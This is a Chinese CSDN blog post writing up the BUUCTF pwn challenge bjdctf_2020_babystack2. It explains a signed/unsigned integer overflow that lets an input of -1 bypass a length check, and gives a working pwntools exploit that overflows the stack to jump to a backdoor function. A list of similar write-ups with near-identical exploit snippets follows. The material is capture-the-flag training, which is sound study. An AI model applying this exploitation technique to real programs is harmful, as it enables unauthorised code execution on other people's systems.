[BUUCTF]PWN——bjdctf_2020_babystack2

最新推荐文章于 2023-03-31 17:33:06 发布
最新推荐文章于 2023-03-31 17:33:06 发布
阅读量989 收藏 1
点赞数
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/BangSen1/article/details/115470350
版权

bjdctf_2020_babystack2

64位,开启NX保护。
在这里插入图片描述
运行一下。
在这里插入图片描述
用IDA打开。找到了后门函数。backdoor=0x400726
在这里插入图片描述
在这里插入图片描述
查看main函数
读入数据的大小由我们输入的参数nbytes控制
nbytes参数的类型 是 size_t,它是一个无符号整型。
但是第7行又将它转换成了有符号的整型,存在整数溢出漏洞(即无符号的数转换成有符号的整型后超过了有符号的整型能表示的范围,从而造成溢出,常用-1来造成溢出)
在这里插入图片描述

from pwn import *

r=remote('node3.buuoj.cn',29186)
backdoor=0x400726

r.recv()
r.sendline('-1')
r.recv()

payload='a'*(0x10+8)+p64(backdoor)
r.sendline(payload)

r.interactive()

在这里插入图片描述

HAIANAWEI
关注
专栏目录
buu bjdctf_2020_babystack2 整数溢出、栈溢出
qq_41849152的博客
09-14 199
整数溢出、栈溢出
BUUCTF bjdctf_2020_babyrop 1 和 2
BengDouLove的博客
04-09 1527
这两个rop其实是差不多的,第二个比第一个多了一个canary 先看一下第一个 bjdctf_2020_babyrop1 init里面两个puts vul里面一个puts一个read 没有system和binsh ,要泄露libc,但是现在没有可以控制的输出手段,,所以要通过read,,覆盖返回地址为puts,,构造参数让puts输出libc的函数 这是网上别人的做法,,首先到pop rd...
bjdctf_2020_babystack2【BUUCTF
qq_41696518的博客
08-31 816
bjdctf_2020_babystack2【BUUCTF
BUUCTF|PWN-bjdctf_2020_babystack2-WP
l2645470582_的博客
11-09 411
1.例行检查保护机制 2.我们用64位的IDA打开该文件 shift+f12查看关键字符串,我们看到关键字符串"/bin/sh" 然后我们找到后门函数的地址:backdoor_addr = 0x0400726 3.我们看看main函数里面的内容 我们看到第一个nbytes是有符号数,第二个nbytes就变成了无符号数 我们判断这是一个整数溢出 所以 -1 = 4294967295 4.EXP #encoding = utf-8 fr...
[BUUCTF-pwn]——bjdctf_2020_babystack
Y_peak的博客
02-10 383
[BUUCTF-pwn]——bjdctf_2020_babystack 题目地址:https://buuoj.cn/challenges#bjdctf_2020_babystack Linux中checksec一下 , 64位的我们要小心参数小于6位的函数. IDA中看看 看到这里不用我多说了吧, So easy !!! exploit from pwn import * p = remote("node3.buuoj.cn",25355) sys = 0x04006EA p.sendlinea
BUUCTFbjdctf_2020_babystack2
m0_51251108的博客
12-30 332
BUUCTFbjdctf_2020_babystack2 64位,无canary 有后门函数 这题思路就是用无符号和有符号整型来绕过10的比较 比如:送入一个-1,无符号类型会把它看成一个很大的正整数,是,而有符号则认为是-1 这题size_t是一种无符号整型,下面被强转成有符号,最后又强转成无符号 所以可以绕过 exp: from pwn import* r=remote('node3.buuoj.cn',29907) context.log_level = 'debug' backdoor=0
BUUCTFbjdctf_2020_babyrop2(write up)
qq_44768749的博客
08-26 928
BUUCTFbjdctf_2020_babyrop20x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01 文件分析 64位程序,开启栈不可执行、canary、部分RELRO保护 0x02 运行 输入两次字符串 0x03 IDA main函数 调用了下面三个函数 init函数 初始化,输出提示 gift函数 存在格式化字符串漏洞 vuln函数 存在栈溢出漏洞 0x04 思路 开启canary保护 可利用gift函数
BUUCTFbjdctf_2020_babystack2(write up)
qq_44768749的博客
08-24 1602
BUUCTFbjdctf_2020_babystack20x01文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01文件分析 64位程序,开启了栈不可执行、部分RELRO保护 0x02 运行 先输入name的长度,再输入name 0x03 IDA 输入nbytes的长度要小于10 同时给出了后面函数直接getshell 0x04 思路 比较nbytes和10的大小,可以利用符号溢出漏洞,输入一个负数,进而输入name的时候可以实现栈溢出跳转到后门函数ge
日行一PWN bjdctf_2020_babystack 尝试动态调试?
m0_57221101的博客
06-02 463
BUUCTF在线评测 (buuoj.cn)还是buu的题,这次没什么好讲的,一道送分题,但是明白了一个道理,不要太相信ida 的伪代码,那玩意的作用是帮你快速看明白题是在干什么,而不是帮你弄清楚做出这道题的细节。尤其是数据长度部分那么直接来分析首先可以看到,只有NX,和部分RELRO保护ida静态分析也是非常干脆的给出了后门程序主函数更是简单,用scanf来输入一个数字,把这个数字作为我们之后再read中的数据MAX大小。而看上面的接收参数只有0x10个大小(看伪代码此处说只有十二个,其实有16个,非常折磨
bjdctf_2020_babystack
m0_52231248的博客
11-07 93
bjdctf_2020_babystack 题目Ubuntu 16 Checksec检查一下 Ida: read函数的读取长度是我们的输入,存在溢出点,offest=0x10+0x8 然后main函数上面就是backdoor函数 构造exp: 成功得到flag:
[BUUCTF-pwn]——bjdctf_2020_babystack2
Y_peak的博客
02-22 224
[BUUCTF-pwn]——bjdctf_2020_babystack2 题目地址: https://buuoj.cn/challenges#bjdctf_2020_babystack2 先checksec一下 在IDA中查看一下,注意想要栈溢出,首先需要nbytes足够大。size_t类型在标准C语言库中,是unsigned int类型, 64位 long unsigned int。 而%d 是按照int类型读取的,我们读入-1。其实就相当于一个很大的数字,但是可以绕过检查。具体可以了解下整型溢出
BUUCTF(pwn)bjdctf_2020_babystack2
半岛铁盒的博客
04-04 208
这是一道整形溢出的题目 from pwn import * p = remote("node3.buuoj.cn",28786) flag=0x400726 p.sendlineafter("[+]Please input the length of your name:\n",'-1') p.recv() payload='a'*(0x10+8)+p64(flag) p.sendline(payload) p.interactive() 有疑问的欢迎留言 ...
[BUUCTF]PWN——bjdctf_2020_babystack
BangSen1的博客
03-29 314
例行检查,64位,开启NX保护 运行一下, 用IDA打开,检索字符串,看到了后门 跟进查看。 找到了地址,shelladdr=0x4006EA 查看主函数 接收函数长度由我们自己决定,由此可以造成溢出。 from pwn import* r=remote('node3.buuoj.cn',25232) shelladdr=0x4006EA r.sendline('100') payload='a'*(0x10+8)+p64(shelladdr) r.sendline(payload) r.
[BUUCTF]PWN18——bjdctf_2020_babystack
mcmuyanga的博客
09-02 2984
[BUUCTF]PWN18——bjdctf_2020_babystack 附件 步骤: 例行检查,64位,开启了nx保护 试运行一下程序 大概了解程序的执行过程后用64位ida打开,shift+f12先查看一下程序里的字符串 看到/bin/sh双击跟进,ctrl+x找到了后门函数,shell_addr=0x4006e6 根据试运行的回显,找到了输入点 一个简单的小程序,buf读入的数据长度由我们输入的nbytes来控制,所以这里可以利用它来溢出 EXP from pwn import* r=re
bjdctf_2020_babystackBUUCTF
qq_41696518的博客
08-26 791
bjdctf_2020_babystack
BUUCTF PWN bjdctf_2020_babystack
Rt1Text的博客
04-23 324
1.checksec+运行 64位/NX保护 2.64位IDA进行中 1.main函数 read()函数溢出 跟进buf,看看偏移 offset=0x10+8 但要注意一点: read(0, buf, (unsigned int)nbytes); 无符号整型,需要输入-1,进行整型溢出 接下来就是常规的操作 backdoor函数地址 3.直接上脚本 from pwn import* #p=process('./12babystack') p=remote...
BUUCTF pwn——bjdctf_2020_babystack
CNS-Enterprise BCC-1701-J
03-31 249
BUUCTF 做题练习
【CTF】bjdctf_2020_babystack2
凉水的博客
06-30 641
bjdctf_2020_babystack2
BUUCTF pwn rip
最新发布
01-28
根据提供的引用内容,BUUCTF PWN-RIP是一个关于PWN技术的详解文章。文章中提到了64位的EIF文件中rbp寄存器的大小为8个字节。如果对这部分不太理解,可以阅读作者的另一篇关于PWN基础知识的文章。 BUUCTF PWN-RIP详解主要讲解了如何利用RIP寄存器来进行PWN攻击。RIP寄存器是存储下一条指令的地址,通过控制RIP寄存器的值,可以改变程序的执行流程,从而实现攻击的目的。 PWN攻击是一种利用软件漏洞来获取对计算机系统的控制权的攻击方式。在PWN攻击中,攻击者通常会利用程序中的漏洞,通过输入特定的数据来改变程序的执行流程,从而实现攻击的目的。 BUUCTF PWN-RIP详解文章提供了一些示例和技巧,帮助读者理解和掌握PWN攻击中利用RIP寄存器的方法。如果你对PWN攻击感兴趣,可以阅读该文章以获取更多详细信息。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值